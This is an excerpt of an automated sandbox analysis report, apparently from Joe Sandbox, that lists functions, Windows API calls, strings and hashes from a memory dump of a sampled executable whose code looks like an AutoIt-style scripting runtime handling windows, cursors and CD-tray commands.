Instruction ID: 738cb1c09183de7b624298f49411177206b53f77540cbbc0c6cbd573aa3601bd
Opcode Fuzzy Hash: 344f48eb0ee10188e33ea2ff66a1bb5c811cd0dd1fe1e81b1c70dfd6c4a4cf0d
Instruction Fuzzy Hash: 1461E472905202FFDB209F64DD05B6E77A8EF82321F258715E801A7191EB7CE941CBA3

Function 007CA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 007CA47A
__swprintf.LIBCMT ref: 007CA51B
_wcscmp.LIBCMT ref: 007CA52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007CA583
_wcscmp.LIBCMT ref: 007CA5BF
GetClassNameW.USER32(?,?,00000400), ref: 007CA5F6
GetDlgCtrlID.USER32(?), ref: 007CA648
GetWindowRect.USER32(?,?), ref: 007CA67E
GetParent.USER32(?), ref: 007CA69C
ScreenToClient.USER32(00000000), ref: 007CA6A3
GetClassNameW.USER32(?,?,00000100), ref: 007CA71D
_wcscmp.LIBCMT ref: 007CA731
GetWindowTextW.USER32(?,?,00000400), ref: 007CA757
_wcscmp.LIBCMT ref: 007CA76B

Part of subcall function 0079362C: _iswctype.LIBCMT ref: 00793634

Strings

%s%u, xrefs: 007CA515

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 886cfe797ea2d31599ff921856a2c21be5e82870b47341a6166b23da11bcf2ec
Instruction ID: 2c56980a66d0a6f59af1dcf9ce7763d2fdf5ecf6bd4e7bea577c15972ec2b7fb
Opcode Fuzzy Hash: 886cfe797ea2d31599ff921856a2c21be5e82870b47341a6166b23da11bcf2ec
Instruction Fuzzy Hash: B2A1B17120460AFBDB14DF64C888FAAB7E8FF4431AF10852DF999D2150DB38E955CB92

Function 007CAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 007CAF18
_wcscmp.LIBCMT ref: 007CAF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 007CAF51
CharUpperBuffW.USER32(?,00000000), ref: 007CAF6E
_wcscmp.LIBCMT ref: 007CAF8C
_wcsstr.LIBCMT ref: 007CAF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 007CAFD5
_wcscmp.LIBCMT ref: 007CAFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 007CB00C
GetClassNameW.USER32(00000018,?,00000400), ref: 007CB055
_wcscmp.LIBCMT ref: 007CB065
GetClassNameW.USER32(00000010,?,00000400), ref: 007CB08D
GetWindowRect.USER32(00000004,?), ref: 007CB0F6

Strings

ThumbnailClass, xrefs: 007CAFE0, 007CB060
@, xrefs: 007CAEF9

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: da96a16b0f4f0595847c8822c5225e2c06dad1966633e0464b51b3b5dcf63495
Instruction ID: b23a40564f80ab85bc30270090b67948e91437ec3602e7bfd86f7154aeaea87b
Opcode Fuzzy Hash: da96a16b0f4f0595847c8822c5225e2c06dad1966633e0464b51b3b5dcf63495
Instruction Fuzzy Hash: 6B819071108209EBDB15DF14C886FBAB7E8EF44319F18846DFD859A092DB38DD85CB61

Function 007CABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 007CAC33

Strings

[HANDLE:, xrefs: 007CAC3F
HANDLE=, xrefs: 007CAC2C
[ALL, xrefs: 007CACD9
[REGEXPTITLE:, xrefs: 007CAC5B
CLASSNAME=, xrefs: 007CAC70
[CLASS:, xrefs: 007CAC83
[LAST, xrefs: 007CACE0
ACTIVE, xrefs: 007CAC0E
REGEXP=, xrefs: 007CAC48
ALL, xrefs: 007CACC7
[ACTIVE, xrefs: 007CAC20
LAST, xrefs: 007CABF8

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: cd1348b6b464b33b15bee2755b38006685c6d744ae791f390af6d92c2ee738d0
Instruction ID: b4668e6522a434c760088e6db75db42a2d01378be763e54398cf366d72e94024
Opcode Fuzzy Hash: cd1348b6b464b33b15bee2755b38006685c6d744ae791f390af6d92c2ee738d0
Instruction Fuzzy Hash: 0031D230A48219F6CF14FB60ED4BFAE73A4AB20765F20402CF41AB11D1EB5D6F04C662

Function 007E4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 007E5013
LoadCursorW.USER32(00000000,00007F00), ref: 007E501E
LoadCursorW.USER32(00000000,00007F03), ref: 007E5029
LoadCursorW.USER32(00000000,00007F8B), ref: 007E5034
LoadCursorW.USER32(00000000,00007F01), ref: 007E503F
LoadCursorW.USER32(00000000,00007F81), ref: 007E504A
LoadCursorW.USER32(00000000,00007F88), ref: 007E5055
LoadCursorW.USER32(00000000,00007F80), ref: 007E5060
LoadCursorW.USER32(00000000,00007F86), ref: 007E506B
LoadCursorW.USER32(00000000,00007F83), ref: 007E5076
LoadCursorW.USER32(00000000,00007F85), ref: 007E5081
LoadCursorW.USER32(00000000,00007F82), ref: 007E508C
LoadCursorW.USER32(00000000,00007F84), ref: 007E5097
LoadCursorW.USER32(00000000,00007F04), ref: 007E50A2
LoadCursorW.USER32(00000000,00007F02), ref: 007E50AD
LoadCursorW.USER32(00000000,00007F89), ref: 007E50B8
GetCursorInfo.USER32(?), ref: 007E50C8

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: bfbfae6e7415b4052ceb8b87da80b3f9fbf460a351703c9d9f4d3ba5668111b4
Instruction ID: 84a743d20f6edfcf383323f4e2628e4254fd8424e1575c49a23a041880fdf639
Opcode Fuzzy Hash: bfbfae6e7415b4052ceb8b87da80b3f9fbf460a351703c9d9f4d3ba5668111b4
Instruction Fuzzy Hash: F53103B1D0931D6ADF109FB68C8996EBFE8FF08754F50452AA50CE7280DA7865008EA1

Function 007FA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007FA259
DestroyWindow.USER32(?,?), ref: 007FA2D3

Part of subcall function 00777BCC: _memmove.LIBCMT ref: 00777C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007FA34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007FA36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007FA382
DestroyWindow.USER32(00000000), ref: 007FA3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00770000,00000000), ref: 007FA3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007FA3F4
GetDesktopWindow.USER32 ref: 007FA40D
GetWindowRect.USER32(00000000), ref: 007FA414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007FA42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007FA444

Part of subcall function 007725DB: GetWindowLongW.USER32(?,000000EB), ref: 007725EC

Strings

tooltips_class32, xrefs: 007FA346, 007FA3D4
0, xrefs: 007FA26F

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 369010303ac5408e753f3447357227b69c2d877c1456cb43e5cc36fecd57afa1
Instruction ID: e35092d87e5d156909aae109d76462845aeb2803f458bb328de396e366c8c7f6
Opcode Fuzzy Hash: 369010303ac5408e753f3447357227b69c2d877c1456cb43e5cc36fecd57afa1
Instruction Fuzzy Hash: 16717BB0144249AFDB25CF28CC49F7677E5FB88300F04492DFA89873A1DB78A902CB56

Function 007FC5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623

DragQueryPoint.SHELL32(?,?), ref: 007FC627

Part of subcall function 007FAB37: ClientToScreen.USER32(?,?), ref: 007FAB60
Part of subcall function 007FAB37: GetWindowRect.USER32(?,?), ref: 007FABD6
Part of subcall function 007FAB37: PtInRect.USER32(?,?,007FC014), ref: 007FABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 007FC690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007FC69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007FC6BE
_wcscat.LIBCMT ref: 007FC6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 007FC705
SendMessageW.USER32(?,000000B0,?,?), ref: 007FC71E
SendMessageW.USER32(?,000000B1,?,?), ref: 007FC735
SendMessageW.USER32(?,000000B1,?,?), ref: 007FC757
DragFinish.SHELL32(?), ref: 007FC75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007FC851

Strings

@GUI_DROPID, xrefs: 007FC77E
@GUI_DRAGID, xrefs: 007FC7C9
@GUI_DRAGFILE, xrefs: 007FC800

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 15186ff6670116bf987405eb8933237a30321662e63227e06a121f9049b70c01
Instruction ID: 7d209d3b15bace199d4d553a98f9df4e0356ef49f2542f5c83797cf154655592
Opcode Fuzzy Hash: 15186ff6670116bf987405eb8933237a30321662e63227e06a121f9049b70c01
Instruction Fuzzy Hash: 4C618D71108304EFCB01EF64DC89DABBBE8FF89350F00492EF695922A1DB749949CB56

Function 007D7D1A Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 007D7D5F
VariantCopy.OLEAUT32(00000000,?), ref: 007D7D68
VariantClear.OLEAUT32(00000000), ref: 007D7D74
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007D7E62
__swprintf.LIBCMT ref: 007D7E92
VarR8FromDec.OLEAUT32(?,?), ref: 007D7EBE
VariantInit.OLEAUT32(?), ref: 007D7F6F
SysFreeString.OLEAUT32(00000016), ref: 007D8003
VariantClear.OLEAUT32(?), ref: 007D805D
VariantClear.OLEAUT32(?), ref: 007D806C
VariantInit.OLEAUT32(00000000), ref: 007D80AA

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 007D7E8C
Default, xrefs: 007D7F1F

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: ab68481f0f62a728da31a5bd08211d8855bda1fec5611367412811759df0c857
Instruction ID: 32a31a7e9bdc3b971192fddbf9a4babb1c3ad9a82e8627d07e1805fb001db3ee
Opcode Fuzzy Hash: ab68481f0f62a728da31a5bd08211d8855bda1fec5611367412811759df0c857
Instruction Fuzzy Hash: 59D1D071608615EBCF189F65D889B7AB7B5BF04700F248497E8059B380EB7CEC44DBA1

Function 007F4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007F4424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007F446F

Strings

GETITEMCOUNT, xrefs: 007F4551
GETTEXT, xrefs: 007F45C2
SELECT, xrefs: 007F4620
CHECK, xrefs: 007F448F
GETSELECTED, xrefs: 007F457F
ISCHECKED, xrefs: 007F45F2
GETTOTALCOUNT, xrefs: 007F4456
COLLAPSE, xrefs: 007F44B5
EXPAND, xrefs: 007F4521
UNCHECK, xrefs: 007F464B
EXISTS, xrefs: 007F44D8

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 07b8535d360274965339c96dc2ebd0901bd1b4704ce860459277e1b7319c7fbb
Instruction ID: fb47ac15cc5c565945700924eb1ffe8446f128c5e3e5435ed30dcc3b792d579b
Opcode Fuzzy Hash: 07b8535d360274965339c96dc2ebd0901bd1b4704ce860459277e1b7319c7fbb
Instruction Fuzzy Hash: AD914C71204315DFCB04EF10C455A7EB7A1AF95350F04886CFA969B3A2CB39ED49CB91

Function 007FB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007FB8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,007F6B11,?), ref: 007FB910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007FB949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007FB98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007FB9C3
FreeLibrary.KERNEL32(?), ref: 007FB9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007FB9DF
DestroyIcon.USER32(?), ref: 007FB9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007FBA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007FBA17

Part of subcall function 00792EFD: __wcsicmp_l.LIBCMT ref: 00792F86

Strings

.icl, xrefs: 007FB82A
.exe, xrefs: 007FB84A
.dll, xrefs: 007FB86D

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 47249d1d49dd400616555e1ebf397bffcf6942301750fda1454e670c4f11e968
Instruction ID: f3d8b833b1cd822afd93562e25e1eae592dc11c34b7651893c2fe5046171de3a
Opcode Fuzzy Hash: 47249d1d49dd400616555e1ebf397bffcf6942301750fda1454e670c4f11e968
Instruction Fuzzy Hash: 9261B071900219FAEB14EF64DC86FBE77A8FF08710F108115FA15D62D1DBB8A981DBA0

Function 007DDC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 007DDCDC
SystemTimeToFileTime.KERNEL32(?,?), ref: 007DDCEC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007DDCF8
__wsplitpath.LIBCMT ref: 007DDD56
_wcscat.LIBCMT ref: 007DDD6E
_wcscat.LIBCMT ref: 007DDD80
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007DDD95
SetCurrentDirectoryW.KERNEL32(?), ref: 007DDDA9
SetCurrentDirectoryW.KERNEL32(?), ref: 007DDDDB
SetCurrentDirectoryW.KERNEL32(?), ref: 007DDDFC
_wcscpy.LIBCMT ref: 007DDE08
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007DDE47

Strings

*.*, xrefs: 007DDE02

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 3fe30440b3764e429317e9e7c28eb5b11b111947a9d157e1c651691761eb6c77
Instruction ID: 3f7852f4654811135965b42f2b15ee6fd6eeb5224a59dc66dacf0b207e32872a
Opcode Fuzzy Hash: 3fe30440b3764e429317e9e7c28eb5b11b111947a9d157e1c651691761eb6c77
Instruction Fuzzy Hash: A7614A725043459FCB20EF64C8489AEB3F8FF89310F04891EE99997251EB39ED45CB92

Function 007D9C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 007D9C7F

Part of subcall function 00777DE1: _memmove.LIBCMT ref: 00777E22

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007D9CA0
__swprintf.LIBCMT ref: 007D9CF9
__swprintf.LIBCMT ref: 007D9D12
_wprintf.LIBCMT ref: 007D9DB9
_wprintf.LIBCMT ref: 007D9DD7

Strings

^ ERROR , xrefs: 007D9D4E
"%s" (%d) : ==> %s:%s%s, xrefs: 007D9DB4
Incorrect parameters to object property !, xrefs: 007D9D5B
"%s" (%d) : ==> %s:, xrefs: 007D9DD2
Line %d (File "%s"):, xrefs: 007D9CF3, 007D9D0C
Error: , xrefs: 007D9D81

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: cd6ec02083debd15690ef9b047549b5f9d6133f61b5cbed6da1ee528790f2608
Instruction ID: 962e84b1950c2bd67fef1179293c0f725b388e2e591f2b367ee67228fca81928
Opcode Fuzzy Hash: cd6ec02083debd15690ef9b047549b5f9d6133f61b5cbed6da1ee528790f2608
Instruction Fuzzy Hash: B4518231901609EACF19EBE0DD4AEEEB779EF14340F504465F509B21A1EB792F58CB60

Function 007DA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00779837: __itow.LIBCMT ref: 00779862
Part of subcall function 00779837: __swprintf.LIBCMT ref: 007798AC

CharLowerBuffW.USER32(?,?), ref: 007DA3CB
GetDriveTypeW.KERNEL32 ref: 007DA418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DA460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DA497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DA4C5

Part of subcall function 00777BCC: _memmove.LIBCMT ref: 00777C06

Strings

set cd door , xrefs: 007DA466
close, xrefs: 007DA3D1
wait, xrefs: 007DA482
close cd wait, xrefs: 007DA4B0
open, xrefs: 007DA3F2
closed, xrefs: 007DA3DF, 007DA3E8
open , xrefs: 007DA427
type cdaudio alias cd wait, xrefs: 007DA443

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 8b43963666b3f493bc8f0d018d257dd9dcf397607a503c7def7b41ba4219642f
Instruction ID: e90927b88c1a733ce7a42a48f9566e8305f38121dad908b210c3a00410ed7e79
Opcode Fuzzy Hash: 8b43963666b3f493bc8f0d018d257dd9dcf397607a503c7def7b41ba4219642f
Instruction Fuzzy Hash: DC515B71104305DFCB04EF14C88586AB7F4FF99758F00886DF89A97261DB79AD49CB92

Function 007CF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,007AE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 007CF8DF
LoadStringW.USER32(00000000,?,007AE029,00000001), ref: 007CF8E8

Part of subcall function 00777DE1: _memmove.LIBCMT ref: 00777E22

GetModuleHandleW.KERNEL32(00000000,00835310,?,00000FFF,?,?,007AE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 007CF90A
LoadStringW.USER32(00000000,?,007AE029,00000001), ref: 007CF90D
__swprintf.LIBCMT ref: 007CF95D
__swprintf.LIBCMT ref: 007CF96E
_wprintf.LIBCMT ref: 007CFA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 007CFA2E

Strings

^ ERROR, xrefs: 007CF9C3
%s (%d) : ==> %s: %s %s, xrefs: 007CFA12
Line %d (File "%s"):, xrefs: 007CF957
Error: , xrefs: 007CF9E5
Line %d:, xrefs: 007CF968

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

